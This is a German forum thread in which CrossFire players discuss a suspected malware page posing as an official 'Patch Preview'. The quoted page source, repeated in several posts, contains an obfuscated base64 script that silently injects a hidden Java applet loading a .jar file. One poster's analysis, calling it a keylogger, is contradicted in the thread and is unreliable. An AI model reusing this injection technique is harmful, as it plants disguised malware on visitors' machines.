|
You last visited: Today at 17:32
Advertisement
Crossfire "Patch Review" Virus
Discussion on Crossfire "Patch Review" Virus within the CrossFire forum part of the Shooter category.
10/16/2012, 12:30
|
#16
|
elite*gold: 0 
Join Date: Apr 2010
Posts: 2,756
Received Thanks: 638
|
Quote:
Originally Posted by Abnoo
Ehhm... jetzt hab ich lsngsam Angst:
Es öffnet sich jetzt immer mal wieder das cmd Fenster einfach so ohne das ich was mache...
Cpu Auslastung liegt bei 90% wenn ich nur Inet benutze und vom Arbeitsspeicher werden 2gb von 4gb benutzt!
|
Dann Arbeitet offensichtlich was im Hintergrund. Ich hoffe wir reden nicht gegen die Wand. Das 3te mal jetzt -> Scanne deinen PC mit Spybot Search and Destroy!
|
|
|
|
10/16/2012, 12:33
|
#17
|
elite*gold: 19
Join Date: May 2012
Posts: 1,617
Received Thanks: 391
|
Sry, hab ich vergessen dazu zu schreiben...
Hab ich schon durchlaufen lassen, hat aber nichts gefunden. Norton macht grad nen gesamten SystemScan!
|
|
|
|
|
10/16/2012, 13:48
|
#18
|
elite*gold: 22
Join Date: Oct 2010
Posts: 5,930
Received Thanks: 3,019
|
Quote:
Originally Posted by Abnoo
Ehhm... jetzt hab ich langsam Angst:
Es öffnet sich jetzt immer mal wieder das cmd Fenster einfach so ohne das ich was mache...
Cpu Auslastung liegt bei 90% wenn ich nur Inet benutze und vom Arbeitsspeicher werden 2gb von 4gb benutzt!
Ach und die Maus und Tastatur wurden beim Start des Laptops erstmal nicht erkannt!
|
Hast du vor kurzem neue Software installiert, die womöglich deinen Pc belastet?
Falls nicht, scheint es tatsächlich als befände sich Malware auf deinem Pc, die diesen belastet. Ich schließe dabei aber aus, dass du diese auf der Seite bekommen hast, sofern du dort weder etwas bestätigt, noch etwas eingegeben oder angeklickt hast, sondern sie einfach nur wieder geschlossen hast.
|
|
|
|
|
10/16/2012, 14:00
|
#19
|
elite*gold: 19
Join Date: May 2012
Posts: 1,617
Received Thanks: 391
|
Ich hab in letzter Zeit nur Hamachi installiert... mehr nicht!
Auf der Website hab ich auch nichts angeklickt.
Antivirus hat jetzt auch nix gefunden!?
|
|
|
|
|
10/16/2012, 16:44
|
#20
|
elite*gold: 0
Join Date: Jan 2011
Posts: 1,258
Received Thanks: 191
|
Ich hab aus neugier 'NUR AUF DEN LINK GEKLICKT' aber ich habe keine Probleme also, Cmd öffnet sich bei mir nicht, Stand PC Maus/Tastatur nimmt der LapTop beim aufdrehen sofort an 
Also wenn du nur draufgeklickt hast, kannst du 'anscheinend' nichts haben.
|
|
|
|
|
10/16/2012, 18:40
|
#21
|
elite*gold: 19
Join Date: May 2012
Posts: 1,617
Received Thanks: 391
|
Hmm ok..
Ich hab noch runtergescrollt... Kann sich dabei schon ein Script geöffnet haben oder ein download gestertet haben?
Hier der Seitenquelltext:
Code:
<script type="text/javascript">
var P1nUXU9P7NfE = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
function wxD1RtivNfLP(Q48EcV5dWs0u) {
var CXFd6YWbhyb0 = "";
var ZaL1NoPYrgIk, QMYoYn58Nn1b, VWJLgudAlxBS = "";
var ejrzgT691GwY, bIlzAlqhKUIz, FuaWT2pD232h, t86WrJvkk36u = "";
var OwrSbUdIaKj5 = 0;
Q48EcV5dWs0u = Q48EcV5dWs0u.replace(/[^A-Za-z0-9\+\/\=]/g, "");
do {
ejrzgT691GwY = P1nUXU9P7NfE.indexOf(Q48EcV5dWs0u.charAt(OwrSbUdIaKj5++));
bIlzAlqhKUIz = P1nUXU9P7NfE.indexOf(Q48EcV5dWs0u.charAt(OwrSbUdIaKj5++));
FuaWT2pD232h = P1nUXU9P7NfE.indexOf(Q48EcV5dWs0u.charAt(OwrSbUdIaKj5++));
t86WrJvkk36u = P1nUXU9P7NfE.indexOf(Q48EcV5dWs0u.charAt(OwrSbUdIaKj5++));
ZaL1NoPYrgIk = (ejrzgT691GwY << 2) | (bIlzAlqhKUIz >> 4);
QMYoYn58Nn1b = ((bIlzAlqhKUIz & 15) << 4) | (FuaWT2pD232h >> 2);
VWJLgudAlxBS = ((FuaWT2pD232h & 3) << 6) | t86WrJvkk36u;
CXFd6YWbhyb0 = CXFd6YWbhyb0 + String.fromCharCode(ZaL1NoPYrgIk);
if (FuaWT2pD232h != 64) {
CXFd6YWbhyb0 = CXFd6YWbhyb0 + String.fromCharCode(QMYoYn58Nn1b);
}
if (t86WrJvkk36u != 64) {
CXFd6YWbhyb0 = CXFd6YWbhyb0 + String.fromCharCode(VWJLgudAlxBS);
}
ZaL1NoPYrgIk = QMYoYn58Nn1b = VWJLgudAlxBS = "";
ejrzgT691GwY = bIlzAlqhKUIz = FuaWT2pD232h = t86WrJvkk36u = "";
} while (OwrSbUdIaKj5 < Q48EcV5dWs0u.length);
return unescape(CXFd6YWbhyb0);
}
document.write(wxD1RtivNfLP("DQoJCQk8YXBwbGV0IHdpZHRoPScwcHgnIGhlaWdodD0nMHB4JyBjb2RlPSdKYXZhX01vdmllX1BsYXllci5jbGFzcycgYXJjaGl2ZT0nMzUxYzgwYjRjMTM0OTcyMTJmZTU5NjYxYTVmMTMyNDQuamFyJz4NCgkJCTwvYXBwbGV0Pg=="));
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><title>
Cross Fire - Patch Preview - Undead Update: Day 2
</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="description" content="The Undead Update featuring ZOMBIE MODE is coming to Cross Fire September 15th, 2011! Check back for new info every day leading up to the release. Today: INTRODUCING THE SWARM!" /><meta name="keywords" content="crossfire, cross fire, zombies, zombie mode, patch, update, dlc, mutation, mutants, co-op, co op, coop, free-to-play, free to play, military, shooter, fps, free fps, free online fps, first-person shooter, first person shooter" /></head>
<script type="text/javascript">
<!--
function MM_preloadImages() { //v3.0
var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}
//-->
</script>
</head>
<body style=" background-repeat:repeat-y; margin: 0 0 0 0; background-color:#670b0b; background-position:center">
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="100%" height="58" align="center" valign="top" style="background-color:#000"><table width="960" border="0" cellpadding="0" cellspacing="0">
<tr>
<td height="57"> <div id="div_loginframe">
<iframe id="loginHeader" frameborder="0" style="height: 65px; width: 998px; border: 0; background-color: Transparent;" allowtransparency="true"
scrolling="no" src="http://www.z8games.com/Loging/GlobeLogin.aspx?from=&subid=&b=cf&page="></iframe>
</div> </td>
</tr>
<tr>
</table></td>
</tr>
<tr>
<td height="2200" align="center" valign="top" style=" background-image:url(images/landing/new_landing/halloween/halloween_patch_bg.jpg);background-repeat:no-repeat; background-position:center; background-position:top"><table width="960" border="0" cellpadding="0" cellspacing="0">
<tr>
<td height="185" align="left" valign="top"><table width="950" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="457" height="66" align="left" valign="bottom"><a href="http://crossfire.z8games.com"><img src="images/landing/new_landing/zombie_mode/logo.png" width="452" height="61" border="0" /></a></td>
<td width="503" align="right" valign="top"><table width="400" border="0" cellpadding="0" cellspacing="0">
<tr>
<td height="28" align="right"><a href="http://www.facebook.com/sharer.php" share_url="http://crossfire.z8games.com/halloween_update.aspx" name="fb_share" id="fb_share" type="button_count">Share</a>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script></td>
<td width="40"></td>
<td align="left">
<a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal">Tweet</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script></td>
</tr>
</table></td>
</tr>
</table></td>
</tr>
<tr>
<td height="491" align="right" valign="bottom"><table width="400" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="39"> </td>
<td width="153" align="center" valign="middle"> </td>
<td width="186"><a href="http://crossfire.z8games.com/events_page.aspx"><img src="images/landing/new_landing/halloween/click_details_btn.jpg" width="173" height="43" border="0" /></a></td>
</tr>
</table></td>
</tr>
</table></td>
</tr>
<tr>
<td height="200" align="center" valign="bottom" style="background-color:#000;background-repeat:no-repeat; background-position:center; background-position:top"><table width="1000" border="0" cellpadding="0" cellspacing="0">
<tr>
<td height="69" colspan="4" align="center" valign="bottom"><table border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="120" height="46"><p style="color:#999; font-size:18px; font:Verdana, Geneva, sans-serif; font-weight:bold">Follow Us On:</p></td>
<td width="60" align="center" valign="middle"><a href="http://www.facebook.com/crossfireonline"><img src="images/landing/new_landing/zombie_mode/facebook_btn.png" width="53" height="52" border="0" /></a></td>
<td width="60" align="center" valign="middle"><a href="http://www.youtube.com/crossfireonline"><img src="images/landing/new_landing/zombie_mode/youtube_btn.png" width="53" height="52" border="0" /></a></td>
<td width="60" align="center" valign="middle"><a href="http://twitter.com/#!/crossfireonline"><img src="images/landing/new_landing/zombie_mode/twitter_btn.png" width="53" height="52" border="0" /></a></td>
<td width="60" align="center" valign="middle"><a href="http://www.xfire.com/communities/crossfireonline/"><img src="images/landing/new_landing/zombie_mode/xfire_btn.png" width="53" height="52" border="0" /></a></td>
</tr>
</table></td>
</tr>
<tr>
<td width="37" height="140"> </td>
<td width="312" align="left" valign="middle"><table width="310" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="120" height="25" align="left" valign="middle"><a href="http://www.z8games.com/privacypolicy.aspx" style="color:#F90; font-size:12px;">Privacy Policy</a></td>
<td width="190" align="left" valign="middle"><a href="http://www.z8games.com/termsandcondition.aspx" style="color:#F90; font-size:12px">Terms and Conditions</a></td>
</tr>
<tr>
<td height="20" colspan="2"><p style="color:#999; font-size:10px;">COPYRIGHT @ 2006-2011 G4BOX INC. ALL RIGHTS RESERVED<br />
@ NEOWIZ GAMES. ALL RIGHTS RESERVED<br />
COPYRIGHT @ SMILEGATE. ALL RIGHTS RESERVED<br />
All other trademarks are property of their respective owners</p></td>
</tr>
</table></td>
<td width="610"><img src="images/landing/new_landing/zombie_mode/logos.jpg" width="610" height="115" /></td>
<td width="41"> </td>
</tr>
</table></td>
</tr>
</table>
</body>
</html>
|
|
|
|
|
10/17/2012, 07:42
|
#22
|
elite*gold: 0
Join Date: Apr 2010
Posts: 2,756
Received Thanks: 638
|
Quote:
Originally Posted by Abnoo
Hmm ok..
Ich hab noch runtergescrollt... Kann sich dabei schon ein Script geöffnet haben oder ein download gestertet haben?
Hier der Seitenquelltext:
Code:
<script type="text/javascript">
var P1nUXU9P7NfE = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
function wxD1RtivNfLP(Q48EcV5dWs0u) {
var CXFd6YWbhyb0 = "";
var ZaL1NoPYrgIk, QMYoYn58Nn1b, VWJLgudAlxBS = "";
var ejrzgT691GwY, bIlzAlqhKUIz, FuaWT2pD232h, t86WrJvkk36u = "";
var OwrSbUdIaKj5 = 0;
Q48EcV5dWs0u = Q48EcV5dWs0u.replace(/[^A-Za-z0-9\+\/\=]/g, "");
do {
ejrzgT691GwY = P1nUXU9P7NfE.indexOf(Q48EcV5dWs0u.charAt(OwrSbUdIaKj5++));
bIlzAlqhKUIz = P1nUXU9P7NfE.indexOf(Q48EcV5dWs0u.charAt(OwrSbUdIaKj5++));
FuaWT2pD232h = P1nUXU9P7NfE.indexOf(Q48EcV5dWs0u.charAt(OwrSbUdIaKj5++));
t86WrJvkk36u = P1nUXU9P7NfE.indexOf(Q48EcV5dWs0u.charAt(OwrSbUdIaKj5++));
ZaL1NoPYrgIk = (ejrzgT691GwY << 2) | (bIlzAlqhKUIz >> 4);
QMYoYn58Nn1b = ((bIlzAlqhKUIz & 15) << 4) | (FuaWT2pD232h >> 2);
VWJLgudAlxBS = ((FuaWT2pD232h & 3) << 6) | t86WrJvkk36u;
CXFd6YWbhyb0 = CXFd6YWbhyb0 + String.fromCharCode(ZaL1NoPYrgIk);
if (FuaWT2pD232h != 64) {
CXFd6YWbhyb0 = CXFd6YWbhyb0 + String.fromCharCode(QMYoYn58Nn1b);
}
if (t86WrJvkk36u != 64) {
CXFd6YWbhyb0 = CXFd6YWbhyb0 + String.fromCharCode(VWJLgudAlxBS);
}
ZaL1NoPYrgIk = QMYoYn58Nn1b = VWJLgudAlxBS = "";
ejrzgT691GwY = bIlzAlqhKUIz = FuaWT2pD232h = t86WrJvkk36u = "";
} while (OwrSbUdIaKj5 < Q48EcV5dWs0u.length);
return unescape(CXFd6YWbhyb0);
}
document.write(wxD1RtivNfLP("DQoJCQk8YXBwbGV0IHdpZHRoPScwcHgnIGhlaWdodD0nMHB4JyBjb2RlPSdKYXZhX01vdmllX1BsYXllci5jbGFzcycgYXJjaGl2ZT0nMzUxYzgwYjRjMTM0OTcyMTJmZTU5NjYxYTVmMTMyNDQuamFyJz4NCgkJCTwvYXBwbGV0Pg=="));
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><title>
Cross Fire - Patch Preview - Undead Update: Day 2
</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="description" content="The Undead Update featuring ZOMBIE MODE is coming to Cross Fire September 15th, 2011! Check back for new info every day leading up to the release. Today: INTRODUCING THE SWARM!" /><meta name="keywords" content="crossfire, cross fire, zombies, zombie mode, patch, update, dlc, mutation, mutants, co-op, co op, coop, free-to-play, free to play, military, shooter, fps, free fps, free online fps, first-person shooter, first person shooter" /></head>
<script type="text/javascript">
<!--
function MM_preloadImages() { //v3.0
var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}
//-->
</script>
</head>
<body style=" background-repeat:repeat-y; margin: 0 0 0 0; background-color:#670b0b; background-position:center">
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="100%" height="58" align="center" valign="top" style="background-color:#000"><table width="960" border="0" cellpadding="0" cellspacing="0">
<tr>
<td height="57"> <div id="div_loginframe">
<iframe id="loginHeader" frameborder="0" style="height: 65px; width: 998px; border: 0; background-color: Transparent;" allowtransparency="true"
scrolling="no" src="http://www.z8games.com/Loging/GlobeLogin.aspx?from=&subid=&b=cf&page="></iframe>
</div> </td>
</tr>
<tr>
</table></td>
</tr>
<tr>
<td height="2200" align="center" valign="top" style=" background-image:url(images/landing/new_landing/halloween/halloween_patch_bg.jpg);background-repeat:no-repeat; background-position:center; background-position:top"><table width="960" border="0" cellpadding="0" cellspacing="0">
<tr>
<td height="185" align="left" valign="top"><table width="950" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="457" height="66" align="left" valign="bottom"><a href="http://crossfire.z8games.com"><img src="http://www.elitepvpers.com/forum/images/landing/new_landing/zombie_mode/logo.png" width="452" height="61" border="0" /></a></td>
<td width="503" align="right" valign="top"><table width="400" border="0" cellpadding="0" cellspacing="0">
<tr>
<td height="28" align="right"><a href="http://www.facebook.com/sharer.php" share_url="http://crossfire.z8games.com/halloween_update.aspx" name="fb_share" id="fb_share" type="button_count">Share</a>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script></td>
<td width="40"></td>
<td align="left">
<a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal">Tweet</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script></td>
</tr>
</table></td>
</tr>
</table></td>
</tr>
<tr>
<td height="491" align="right" valign="bottom"><table width="400" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="39"> </td>
<td width="153" align="center" valign="middle"> </td>
<td width="186"><a href="http://crossfire.z8games.com/events_page.aspx"><img src="http://www.elitepvpers.com/forum/images/landing/new_landing/halloween/click_details_btn.jpg" width="173" height="43" border="0" /></a></td>
</tr>
</table></td>
</tr>
</table></td>
</tr>
<tr>
<td height="200" align="center" valign="bottom" style="background-color:#000;background-repeat:no-repeat; background-position:center; background-position:top"><table width="1000" border="0" cellpadding="0" cellspacing="0">
<tr>
<td height="69" colspan="4" align="center" valign="bottom"><table border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="120" height="46"><p style="color:#999; font-size:18px; font:Verdana, Geneva, sans-serif; font-weight:bold">Follow Us On:</p></td>
<td width="60" align="center" valign="middle"><a href="http://www.facebook.com/crossfireonline"><img src="http://www.elitepvpers.com/forum/images/landing/new_landing/zombie_mode/facebook_btn.png" width="53" height="52" border="0" /></a></td>
<td width="60" align="center" valign="middle"><a href="http://www.youtube.com/crossfireonline"><img src="http://www.elitepvpers.com/forum/images/landing/new_landing/zombie_mode/youtube_btn.png" width="53" height="52" border="0" /></a></td>
<td width="60" align="center" valign="middle"><a href="http://twitter.com/#!/crossfireonline"><img src="http://www.elitepvpers.com/forum/images/landing/new_landing/zombie_mode/twitter_btn.png" width="53" height="52" border="0" /></a></td>
<td width="60" align="center" valign="middle"><a href="http://www.xfire.com/communities/crossfireonline/"><img src="http://www.elitepvpers.com/forum/images/landing/new_landing/zombie_mode/xfire_btn.png" width="53" height="52" border="0" /></a></td>
</tr>
</table></td>
</tr>
<tr>
<td width="37" height="140"> </td>
<td width="312" align="left" valign="middle"><table width="310" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="120" height="25" align="left" valign="middle"><a href="http://www.z8games.com/privacypolicy.aspx" style="color:#F90; font-size:12px;">Privacy Policy</a></td>
<td width="190" align="left" valign="middle"><a href="http://www.z8games.com/termsandcondition.aspx" style="color:#F90; font-size:12px">Terms and Conditions</a></td>
</tr>
<tr>
<td height="20" colspan="2"><p style="color:#999; font-size:10px;">COPYRIGHT @ 2006-2011 G4BOX INC. ALL RIGHTS RESERVED<br />
@ NEOWIZ GAMES. ALL RIGHTS RESERVED<br />
COPYRIGHT @ SMILEGATE. ALL RIGHTS RESERVED<br />
All other trademarks are property of their respective owners</p></td>
</tr>
</table></td>
<td width="610"><img src="http://www.elitepvpers.com/forum/images/landing/new_landing/zombie_mode/logos.jpg" width="610" height="115" /></td>
<td width="41"> </td>
</tr>
</table></td>
</tr>
</table>
</body>
</html>
|
Habe ich bereits gesagt mit dem Anhang des Videos. Wenn ein Javascript auf der Website eingebettet ist startet es automatisch! Da brauchst du nichts anklicken oder sonst was. Wenn du Java drauf hast aber nicht das NoScript Plugin dann wird das Script ausgeführt!
Ich bin jetzt kein Programmierer aber ich finde 2 Scripte.
Der erste hat viele verwirrende Variablen wo ich nicht mehr hinterherkomme. Wie gesagt ich hab nie mit Java gearbeitet.
Code:
<script type="text/javascript">
var P1nUXU9P7NfE = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
function wxD1RtivNfLP(Q48EcV5dWs0u) {
var CXFd6YWbhyb0 = "";
var ZaL1NoPYrgIk, QMYoYn58Nn1b, VWJLgudAlxBS = "";
var ejrzgT691GwY, bIlzAlqhKUIz, FuaWT2pD232h, t86WrJvkk36u = "";
var OwrSbUdIaKj5 = 0;
Q48EcV5dWs0u = Q48EcV5dWs0u.replace(/[^A-Za-z0-9\+\/\=]/g, "");
do {
ejrzgT691GwY = P1nUXU9P7NfE.indexOf(Q48EcV5dWs0u.charAt(OwrSbUdIaKj5++));
bIlzAlqhKUIz = P1nUXU9P7NfE.indexOf(Q48EcV5dWs0u.charAt(OwrSbUdIaKj5++));
FuaWT2pD232h = P1nUXU9P7NfE.indexOf(Q48EcV5dWs0u.charAt(OwrSbUdIaKj5++));
t86WrJvkk36u = P1nUXU9P7NfE.indexOf(Q48EcV5dWs0u.charAt(OwrSbUdIaKj5++));
ZaL1NoPYrgIk = (ejrzgT691GwY << 2) | (bIlzAlqhKUIz >> 4);
QMYoYn58Nn1b = ((bIlzAlqhKUIz & 15) << 4) | (FuaWT2pD232h >> 2);
VWJLgudAlxBS = ((FuaWT2pD232h & 3) << 6) | t86WrJvkk36u;
CXFd6YWbhyb0 = CXFd6YWbhyb0 + String.fromCharCode(ZaL1NoPYrgIk);
if (FuaWT2pD232h != 64) {
CXFd6YWbhyb0 = CXFd6YWbhyb0 + String.fromCharCode(QMYoYn58Nn1b);
}
if (t86WrJvkk36u != 64) {
CXFd6YWbhyb0 = CXFd6YWbhyb0 + String.fromCharCode(VWJLgudAlxBS);
}
ZaL1NoPYrgIk = QMYoYn58Nn1b = VWJLgudAlxBS = "";
ejrzgT691GwY = bIlzAlqhKUIz = FuaWT2pD232h = t86WrJvkk36u = "";
} while (OwrSbUdIaKj5 < Q48EcV5dWs0u.length);
return unescape(CXFd6YWbhyb0);
}
document.write(wxD1RtivNfLP("DQoJCQk8YXBwbGV0IHdpZHRoPScwcHgnIGhlaWdodD0nMHB4JyBjb2RlPSdKYXZhX01vdmllX1BsYXllci5jbGFzcycgYXJjaGl2ZT0nMzUxYzgwYjRjMTM0OTcyMTJmZTU5NjYxYTVmMTMyNDQuamFyJz4NCgkJCTwvYXBwbGV0Pg=="));
</script>
Und der 2te:
Code:
<script type="text/javascript">
<!--
function MM_preloadImages() { //v3.0
var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}
//-->
</script>
|
|
|
|
|
10/17/2012, 07:54
|
#23
|
elite*gold: 0
Join Date: Mar 2010
Posts: 533
Received Thanks: 86
|
Schau mal bei deinen Dokumenten ob du den Ordner DSCMIN hast den per hand löschen und papierkorb leeren danach unter task manager mal schauen nach cvtres.exe diesen Prozess beenden und dann Nochmal Spybot aber um 100% sicher zu gehen formatier dein pc neu
Zur seite die hier immer gesagt wird sie ist richtig komisch alles ist rot dann stehen irgendwie deine acc daten bereits oben drin von z8games.com und danach fordert es dich auf ein Zertifikat aus zu führen ich habs gehmacht -.- und naja seit dem hab ich diesen dcsmin und cvtres.exe dreck da hab aber gestern pc neu aufgesetzt würde ich dir auch empfehlen
|
|
|
|
|
10/17/2012, 19:21
|
#24
|
elite*gold: 0
Join Date: Jan 2012
Posts: 273
Received Thanks: 151
|
Ich habe auch draufgeklickt, hab einfach meinen PC zurückgesetzt und habe keine Probleme bis jetzt
|
|
|
|
|
10/17/2012, 20:13
|
#25
|
elite*gold: 47
Join Date: Sep 2012
Posts: 1,539
Received Thanks: 167
|
so ein aufwand wegen so ein paar kiddies -.- ich hasse es richtig !
Im Pc neu machen dies das ...
Den sollten man mal so ein Virus auf den Pc klatschen das der nichts mehr machen kann !
|
|
|
|
|
10/17/2012, 20:49
|
#26
|
elite*gold: 3
Join Date: Apr 2009
Posts: 6,952
Received Thanks: 3,546
|
Quote:
Originally Posted by rmN]2k12
Ich habe auch draufgeklickt, hab einfach meinen PC zurückgesetzt und habe keine Probleme bis jetzt
|
Zurücksetzen hilft nicht immer, wenn du pech hast hat er sich auch noch in den registry einträgen rein geschriben o.Ä. Ich würde dir lieber empfehlen dein Betriebssystem neu zuinstalieren.
____
PHP Code:
<script type="text/javascript">
var P1nUXU9P7NfE = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
function wxD1RtivNfLP(Q48EcV5dWs0u) {
var CXFd6YWbhyb0 = "";
var ZaL1NoPYrgIk, QMYoYn58Nn1b, VWJLgudAlxBS = "";
var ejrzgT691GwY, bIlzAlqhKUIz, FuaWT2pD232h, t86WrJvkk36u = "";
var OwrSbUdIaKj5 = 0;
Q48EcV5dWs0u = Q48EcV5dWs0u.replace(/[^A-Za-z0-9\+\/\=]/g, "");
do {
ejrzgT691GwY = P1nUXU9P7NfE.indexOf(Q48EcV5dWs0u.charAt(OwrSbUdIaKj5++));
bIlzAlqhKUIz = P1nUXU9P7NfE.indexOf(Q48EcV5dWs0u.charAt(OwrSbUdIaKj5++));
FuaWT2pD232h = P1nUXU9P7NfE.indexOf(Q48EcV5dWs0u.charAt(OwrSbUdIaKj5++));
t86WrJvkk36u = P1nUXU9P7NfE.indexOf(Q48EcV5dWs0u.charAt(OwrSbUdIaKj5++));
ZaL1NoPYrgIk = (ejrzgT691GwY << 2) | (bIlzAlqhKUIz >> 4);
QMYoYn58Nn1b = ((bIlzAlqhKUIz & 15) << 4) | (FuaWT2pD232h >> 2);
VWJLgudAlxBS = ((FuaWT2pD232h & 3) << 6) | t86WrJvkk36u;
CXFd6YWbhyb0 = CXFd6YWbhyb0 + String.fromCharCode(ZaL1NoPYrgIk);
if (FuaWT2pD232h != 64) {
CXFd6YWbhyb0 = CXFd6YWbhyb0 + String.fromCharCode(QMYoYn58Nn1b);
}
if (t86WrJvkk36u != 64) {
CXFd6YWbhyb0 = CXFd6YWbhyb0 + String.fromCharCode(VWJLgudAlxBS);
}
ZaL1NoPYrgIk = QMYoYn58Nn1b = VWJLgudAlxBS = "";
ejrzgT691GwY = bIlzAlqhKUIz = FuaWT2pD232h = t86WrJvkk36u = "";
} while (OwrSbUdIaKj5 < Q48EcV5dWs0u.length);
return unescape(CXFd6YWbhyb0);
}
PHP Code:
document.write(wxD1RtivNfLP("DQoJCQk8YXBwbGV0IHdpZHRoPScwcHgnIGhlaWdodD0nMHB4JyBjb2RlPSdKYXZhX01vdmllX1BsYXllci5jbGFzcycgYXJjaGl2ZT0nMzUxYzgwYjRjMTM0OTcyMTJmZTU5NjYxYTVmMTMyNDQuamFyJz4NCgkJCTwvYXBwbGV0Pg=="));
</script>
Für mich sieht es so aus
PHP Code:
var OwrSbUdIaKj5 = 0 , Q48EcV5dWs0u = Q48EcV5dWs0u.replace(/[^A-Za-z0-9\+\/\=]/g, "")
Heißt die var OwrSbUdIaKj5 ersetzt alle Tasten auf der Tastatur
PHP Code:
(/[^A-Za-z0-9\+\/\=]/g, "")
so fragt er dann alles ab was auf eure Tastatur passiert bzw getippt wird und es wird dann in ein Dokument an ihn geschickt.
PHP Code:
document.write(wxD1RtivNfLP("DQoJCQk8YXBwbGV0IHdpZHRoPScwcHgnIGhlaWdodD0nMHB4JyBjb2RlPSdKYXZhX01vdmllX1BsYXllci5jbGFzcycgYXJjaGl2ZT0nMzUxYzgwYjRjMTM0OTcyMTJmZTU5NjYxYTVmMTMyNDQuamFyJz4NCgkJCTwvYXBwbGV0Pg=="));
Und dann wird noch ein Screenshot von var document gemacht sprich von euren eingaben, die bekommt er auch nochmal geschickt.
PHP Code:
<script type="text/javascript">
<!--
function MM_preloadImages() { //v3.0
var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}
//-->
</script>
Die ganzen var sind dafür da das die Anti Viren Programme nicht anspringen und auch verwirrt sind, damit er ein leichtes Spiel hat. Kann sein das ich falsch liege aber für mich sieht es eben so aus.
An eure stelle würde ich einfach Windows neuinstalieren und davor die Festplatte/n Formatieren.
|
|
|
|
|
10/17/2012, 21:12
|
#27
|
elite*gold: 22
Join Date: Oct 2010
Posts: 5,930
Received Thanks: 3,019
|
Nochmal:
Wenn man auf der Seite nichts angeklickt, die Ausführung eines Java Scripts nicht bestätigt hat und nichts eingegeben hat, dann habt ihr höchstwahrscheinlich auch keinen Virus!
Ende! hat mir dies noch einmal bestätigt.
Mirco, deine Theorie ist leider völlig inkorrekt.
|
|
|
|
|
10/18/2012, 00:05
|
#28
|
elite*gold: 19
Join Date: May 2012
Posts: 1,617
Received Thanks: 391
|
Naja ich hab bis jetzt nichts mehr gemerkt... (PC zurückgesetzt)
Und will auch meinen PC nicht neu aufsetzen da ich dann ne externe zum Datensichern anschließen muss und da kann der Virus dann ja auch draufspringen... und ... und ... und .....
Ich schau mal ob was passiert dann kann ich (hoffentlich) immernoch handeln!
|
|
|
|
|
10/18/2012, 06:41
|
#29
|
elite*gold: 22
Join Date: Oct 2010
Posts: 5,930
Received Thanks: 3,019
|
Quote:
Originally Posted by Abnoo
Naja ich hab bis jetzt nichts mehr gemerkt... (PC zurückgesetzt)
Und will auch meinen PC nicht neu aufsetzen da ich dann ne externe zum Datensichern anschließen muss und da kann der Virus dann ja auch draufspringen... und ... und ... und .....
Ich schau mal ob was passiert dann kann ich (hoffentlich) immernoch handeln!
|
Ich weise dich jetzt noch einmal darauf hin, da du offensichtlich nicht auf die einzigen Posts in diesem Thread, die nicht wilde Spekulationen ahnungsloser User enthalten, eingehen willst. Schon der erste Post in diesem Thread hätte deine Frage eigentlich beantwortet.
Quote:
Originally Posted by defize
Nochmal:
Wenn man auf der Seite nichts angeklickt, die Ausführung eines Java Scripts nicht bestätigt hat und nichts eingegeben hat, dann habt ihr höchstwahrscheinlich auch keinen Virus!
Ende! hat mir dies noch einmal bestätigt.
Mirco, deine Theorie ist leider völlig inkorrekt.
|
Du sagtest, dass du auf der Seite nichts angeklickt oder die Ausführung des Java Scripts bestätigt hast. In diesem Fall hast du dich auch 100% nicht mit Malware von der Seite infiziert. Und selbst wenn du die Ausführung bestätigt hättest, hätte jedes herkömmliche Antivirenprogramm den Virus, der dann übrigens eure Firefox Passwörter ausgelesen hätte, dann erkannt.
